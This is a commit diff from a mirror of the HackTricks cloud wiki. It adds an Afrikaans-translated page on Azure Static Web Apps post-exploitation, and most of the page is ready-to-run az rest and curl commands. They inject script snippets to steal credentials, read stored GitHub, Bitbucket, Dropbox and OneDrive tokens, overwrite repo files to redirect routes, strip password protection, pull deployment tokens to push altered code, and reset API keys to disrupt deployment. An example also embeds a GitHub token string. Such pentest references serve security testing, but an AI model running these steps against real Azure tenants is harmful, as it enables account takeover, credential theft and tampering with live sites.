mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-20 00:20:44 -08:00
Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/
This commit is contained in:
Translator
@@ -0,0 +1,162 @@
|
||||
# Az - Statiese Web Apps Post Exploitatie
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Azure Statiese Web Apps
|
||||
|
||||
Vir meer inligting oor hierdie diens, kyk:
|
||||
|
||||
{{#ref}}
|
||||
../az-services/az-static-web-apps.md
|
||||
{{#endref}}
|
||||
|
||||
### Microsoft.Web/staticSites/snippets/write
|
||||
|
||||
Dit is moontlik om 'n statiese webblad te laat laai arbitraire HTML-kode deur 'n snit te skep. Dit kan 'n aanvaller toelaat om JS-kode binne die webtoepassing in te voeg en sensitiewe inligting soos geloofsbriewe of mnemonic sleutels (in web3 beursies) te steel.
|
||||
|
||||
Die volgende opdrag skep 'n snit wat altyd deur die webtoepassing gelaai sal word::
|
||||
```bash
|
||||
az rest \
|
||||
--method PUT \
|
||||
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
|
||||
--headers "Content-Type=application/json" \
|
||||
--body '{
|
||||
"properties": {
|
||||
"name": "supersnippet",
|
||||
"location": "Body",
|
||||
"applicableEnvironmentsMode": "AllEnvironments",
|
||||
"content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
|
||||
"environments": [],
|
||||
"insertBottom": false
|
||||
}
|
||||
}'
|
||||
```
|
||||
### Lees Geconfigureerde Derdeparty Kredensiale
|
||||
|
||||
Soos verduidelik in die App Service afdeling:
|
||||
|
||||
{{#ref}}
|
||||
../az-privilege-escalation/az-app-services-privesc.md
|
||||
{{#endref}}
|
||||
|
||||
Deur die volgende opdrag uit te voer, is dit moontlik om **die derdeparty kredensiale** wat in die huidige rekening geconfigureer is, te lees. Let daarop dat as daar byvoorbeeld sommige Github kredensiale in 'n ander gebruiker geconfigureer is, jy nie die token van 'n ander een sal kan bekom nie.
|
||||
```bash
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
|
||||
```
|
||||
Hierdie opdrag gee tokens terug vir Github, Bitbucket, Dropbox en OneDrive.
|
||||
|
||||
Hier is 'n paar opdragvoorbeelde om die tokens te kontroleer:
|
||||
```bash
|
||||
# GitHub – List Repositories
|
||||
curl -H "Authorization: token <token>" \
|
||||
-H "Accept: application/vnd.github.v3+json" \
|
||||
https://api.github.com/user/repos
|
||||
|
||||
# Bitbucket – List Repositories
|
||||
curl -H "Authorization: Bearer <token>" \
|
||||
-H "Accept: application/json" \
|
||||
https://api.bitbucket.org/2.0/repositories
|
||||
|
||||
# Dropbox – List Files in Root Folder
|
||||
curl -X POST https://api.dropboxapi.com/2/files/list_folder \
|
||||
-H "Authorization: Bearer <token>" \
|
||||
-H "Content-Type: application/json" \
|
||||
--data '{"path": ""}'
|
||||
|
||||
# OneDrive – List Files in Root Folder
|
||||
curl -H "Authorization: Bearer <token>" \
|
||||
-H "Accept: application/json" \
|
||||
https://graph.microsoft.com/v1.0/me/drive/root/children
|
||||
```
|
||||
### Oorskrywe lêer - Oorskrywe roetes, HTML, JS...
|
||||
|
||||
Dit is moontlik om **'n lêer binne die Github repo** wat die app bevat, deur Azure te oorskrywe deur die **Github token** 'n versoek te stuur soos die volgende wat die pad van die lêer om te oorskrywe, die inhoud van die lêer en die verbintenisboodskap sal aandui.
|
||||
|
||||
Dit kan deur aanvallers misbruik word om basies **die inhoud van die web app te verander** om kwaadwillige inhoud te dien (steel geloofsbriewe, mnemonic sleutels...) of net om **sekere pades** na hul eie bedieners te herlei deur die `staticwebapp.config.json` lêer te oorskrywe.
|
||||
|
||||
> [!WARNING]
|
||||
> Let daarop dat as 'n aanvaller daarin slaag om die Github repo op enige manier te kompromitteer, hulle ook die lêer direk vanaf Github kan oorskrywe.
|
||||
```bash
|
||||
curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"commit": {
|
||||
"message": "Update static web app route configuration",
|
||||
"branchName": "main",
|
||||
"committer": {
|
||||
"name": "Azure App Service",
|
||||
"email": "donotreply@microsoft.com"
|
||||
},
|
||||
"contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
|
||||
"filePath": "staticwebapp.config.json",
|
||||
"message": "Update static web app route configuration",
|
||||
"repoName": "carlospolop/my-first-static-web-app",
|
||||
"sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
|
||||
},
|
||||
"gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
|
||||
}'
|
||||
```
|
||||
### Microsoft.Web/staticSites/config/write
|
||||
|
||||
Met hierdie toestemming is dit moontlik om die **wagwoord** wat 'n statiese webtoepassing beskerm, te **wysig** of selfs elke omgewing te ontprotect deur 'n versoek soos die volgende te stuur:
|
||||
```bash
|
||||
# Change password
|
||||
az rest --method put \
|
||||
--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
|
||||
--headers 'Content-Type=application/json' \
|
||||
--body '{
|
||||
"name": "basicAuth",
|
||||
"type": "Microsoft.Web/staticSites/basicAuth",
|
||||
"properties": {
|
||||
"password": "SuperPassword123.",
|
||||
"secretUrl": "",
|
||||
"applicableEnvironmentsMode": "AllEnvironments"
|
||||
}
|
||||
}'
|
||||
|
||||
# Remove the need of a password
|
||||
az rest --method put \
|
||||
--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
|
||||
--headers 'Content-Type=application/json' \
|
||||
--body '{
|
||||
"name": "basicAuth",
|
||||
"type": "Microsoft.Web/staticSites/basicAuth",
|
||||
"properties": {
|
||||
"secretUrl": "",
|
||||
"applicableEnvironmentsMode": "SpecifiedEnvironments",
|
||||
"secretState": "None"
|
||||
}
|
||||
}'
|
||||
```
|
||||
### Microsoft.Web/staticSites/listSecrets/action
|
||||
|
||||
Hierdie toestemming laat toe om die **API sleutel ontplooiingstoken** vir die statiese app te verkry.
|
||||
|
||||
Hierdie token laat toe om die app te ontplooi.
|
||||
```bash
|
||||
az rest --method POST \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/listSecrets?api-version=2023-01-01"
|
||||
```
|
||||
Dan, om 'n app op te dateer, kan jy die volgende opdrag uitvoer. Let daarop dat hierdie opdrag verkry is deur te kyk **hoe Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) werk**, aangesien dit die een is wat Azure standaard ingestel het om te gebruik. So die beeld en betalings kan in die toekoms verander.
|
||||
|
||||
1. Laai die repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) af (of enige ander repo wat jy wil ontplooi) en voer `cd react-basic` uit.
|
||||
2. Verander die kode wat jy wil ontplooi
|
||||
3. Ontplooi dit deur (Onthou om die `<api-token>` te verander):
|
||||
```bash
|
||||
docker run -it --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN=<api-token> INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose
|
||||
```
|
||||
### Microsoft.Web/staticSites/write
|
||||
|
||||
Met hierdie toestemming is dit moontlik om die **bron van die statiese webtoepassing na 'n ander Github-repo te verander**, egter, dit sal nie outomaties voorsien word nie, aangesien dit gewoonlik vanaf 'n Github-aksie gedoen moet word met die token wat die aksie gemagtig het, aangesien hierdie token nie outomaties binne die Github-geheime van die repo opgedateer word nie (dit word net outomaties bygevoeg wanneer die toepassing geskep word).
|
||||
```bash
|
||||
az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main
|
||||
```
|
||||
### Microsoft.Web/staticSites/resetapikey/action
|
||||
|
||||
Met hierdie toestemming is dit moontlik om die **API-sleutel van die statiese webtoepassing te reset**, wat moontlik die werkvloei wat die toepassing outomaties ontplooi, kan DoS.
|
||||
```bash
|
||||
az rest --method POST \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/resetapikey?api-version=2019-08-01"
|
||||
```
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
Reference in New Issue
Block a user